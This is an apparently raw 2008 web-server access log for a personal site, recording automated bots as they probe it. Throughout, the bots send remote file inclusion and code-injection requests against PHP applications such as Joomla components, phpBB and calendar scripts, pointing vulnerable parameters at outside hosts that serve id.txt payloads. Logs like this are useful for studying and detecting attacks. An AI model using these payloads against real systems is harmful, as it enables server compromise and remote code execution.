80.68.91.248 - - [23/Jul/2008:09:13:37 -0700] "GET //include/admin.lib.inc.php?site_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:13:45 -0700] "GET /logs/access_080303.log/myPHPCalendar/admin.php?cal_dir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:13:45 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:13:45 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:13:46 -0700] "GET /logs/access_080208.log/myPHPCalendar/admin.php?cal_dir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.139.117 - - [23/Jul/2008:09:13:49 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.139.117 - - [23/Jul/2008:09:13:49 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:13:56 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.27.149.4 - - [23/Jul/2008:09:13:56 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:13:59 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:14:00 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:14:02 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:14:02 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.6 - - [23/Jul/2008:09:14:16 -0700] "GET /logs/access_080207.log//sources/join.php?CONFIG[path]=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /logs/access.log/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /logs/access.log/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /logs/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:37 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:38 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:39 -0700] "GET /?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 18393 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.149 - - [23/Jul/2008:09:14:40 -0700] "GET /logs/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/id??? HTTP/1.1" 200 57423 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:15:19 -0700] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:15:19 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:15:20 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:15:20 -0700] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:15:20 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:15:21 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:15:47 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:16:11 -0700] "GET /logs/access_080225.log/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.231.35.38 - - [23/Jul/2008:09:16:11 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.231.35.38 - - [23/Jul/2008:09:16:11 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:16:12 -0700] "GET /logs/access_080225.log/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.231.35.38 - - [23/Jul/2008:09:16:12 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
203.231.35.38 - - [23/Jul/2008:09:16:26 -0700] "GET /logs/access_080118.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
74.6.18.246 - - [23/Jul/2008:09:16:52 -0700] "GET /logs/?S=D HTTP/1.0" 200 57407 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:17:15 -0700] "GET /logs//sources/join.php?CONFIG[path]=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:17:15 -0700] "GET /logs//sources/join.php?CONFIG[path]=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:17:15 -0700] "GET //sources/join.php?CONFIG[path]=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
132.234.251.211 - - [23/Jul/2008:09:17:15 -0700] "GET //sources/join.php?CONFIG[path]=http://h1.ripway.com/jovem2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.120.225.104 - - [23/Jul/2008:09:17:52 -0700] "GET /logs/access_071225.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
58.120.225.104 - - [23/Jul/2008:09:17:52 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
58.120.225.104 - - [23/Jul/2008:09:17:52 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:18:11 -0700] "GET /logs/access_080123.log/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:18:11 -0700] "GET /becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:18:12 -0700] "GET /logs/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:18:34 -0700] "GET /logs/access_080207.log/becommunity/community/index.php?pageurl=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:41 -0700] "GET /logs/access.log/errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:41 -0700] "GET /logs/access.log/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:41 -0700] "GET /errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:41 -0700] "GET /index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:42 -0700] "GET /logs/errors.php?error=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:42 -0700] "GET /logs/index2.php?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.65.2.210 - - [23/Jul/2008:09:18:51 -0700] "GET /logs/access_080313.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:51 -0700] "GET /logs/access.log/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:18:55 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:55 -0700] "GET /?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 200 18403 "-" "libwww-perl/5.65" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:18:56 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.233.114.168 - - [23/Jul/2008:09:18:56 -0700] "GET /logs/?DOCUMENT_ROOT=http://neu_2.lasrv-1.de/web/%20/id.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.65" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:18:58 -0700] "GET /logs/access_080303.log/myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:18:59 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:18:59 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:19:21 -0700] "GET /logs/access_080205.log/yabbse/Sources/Packages.php?sourcedir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:19:21 -0700] "GET /yabbse/Sources/Packages.php?sourcedir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:19:21 -0700] "GET /logs/yabbse/Sources/Packages.php?sourcedir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:19:22 -0700] "GET /logs/access_080309.log/yabbse/Sources/Packages.php?sourcedir=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
91.198.175.18 - - [23/Jul/2008:09:19:29 -0700] "GET /logs/access_080212.log//admin/spaw/spaw_control.class.php?spaw_root=http://kingkool2.free.fr/ezupload/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:19:37 -0700] "GET /logs/access_080321.log/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:19:37 -0700] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.194.67.123 - - [23/Jul/2008:09:19:38 -0700] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.120.225.104 - - [23/Jul/2008:09:19:51 -0700] "GET /logs/access.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:20:02 -0700] "GET /logs/access_080208.log/myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:20:17 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:20:38 -0700] "GET /logs/access_080303.log/myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:20:38 -0700] "GET /myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:20:39 -0700] "GET /logs/myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
12.53.219.68 - - [23/Jul/2008:09:21:09 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.53.219.68 - - [23/Jul/2008:09:21:09 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://h1.ripway.com/asucok/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:21:19 -0700] "GET /logs/access_080208.log/myPHPCalendar/admin.php?cal_dir=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:21:36 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:21:36 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:21:37 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:21:37 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:21:37 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:22:03 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:22:03 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.marionuk.co.uk/gallery/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.40.222.226 - - [23/Jul/2008:09:22:04 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.40.222.226 - - [23/Jul/2008:09:22:04 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
216.40.222.226 - - [23/Jul/2008:09:22:04 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.latiatrini.com/tienda/tb/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:22:08 -0700] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:22:08 -0700] "GET /logs/access.log/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:22:08 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:22:08 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:22:09 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:22:09 -0700] "GET /logs/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.98.3 - - [23/Jul/2008:09:22:15 -0700] "GET /logs/param.peoplebook.php?mosConfig_absolute_path=http://utenti.lycos.it/kaizoku384/HRtest/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.98.3 - - [23/Jul/2008:09:22:16 -0700] "GET /param.peoplebook.php?mosConfig_absolute_path=http://utenti.lycos.it/kaizoku384/HRtest/include/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:22:20 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:22:20 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [23/Jul/2008:09:22:21 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.202.1.177 - - [23/Jul/2008:09:22:57 -0700] "GET /logs/access_080329.log/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.38 - - [23/Jul/2008:09:22:59 -0700] "GET /logs/access_080329.log/agendax/addevent.inc.php?agendax_path=http://www.call.org.tw/album/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.128.122.28 - - [23/Jul/2008:09:23:15 -0700] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
217.128.122.28 - - [23/Jul/2008:09:23:15 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:23:20 -0700] "GET /errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:23:20 -0700] "GET /logs/errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.245.166.92 - - [23/Jul/2008:09:23:21 -0700] "GET /logs/access.log/errors.php?error=http://gaara.007gb.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.75.193.70 - - [23/Jul/2008:09:23:33 -0700] "GET /lostpasswd.php?env[include_prefix]=http://wearecanadians.com/ray/modules/global/install/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.75.193.70 - - [23/Jul/2008:09:23:33 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://wearecanadians.com/ray/modules/global/install/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
217.20.138.101 - - [23/Jul/2008:09:23:41 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://medicalpolymer.co.kr/phpMyAdmin/libraries/auth/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:23:54 -0700] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:23:54 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.114.145.73 - - [23/Jul/2008:09:23:55 -0700] "GET /logs/access_080225.log/modules/agendax/addevent.inc.php?agendax_path=http://mogollonphotography.com/images/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.223.69.2 - - [23/Jul/2008:09:24:16 -0700] "GET /logs/access_080207.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.223.69.2 - - [23/Jul/2008:09:24:18 -0700] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.djplasma.ch/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
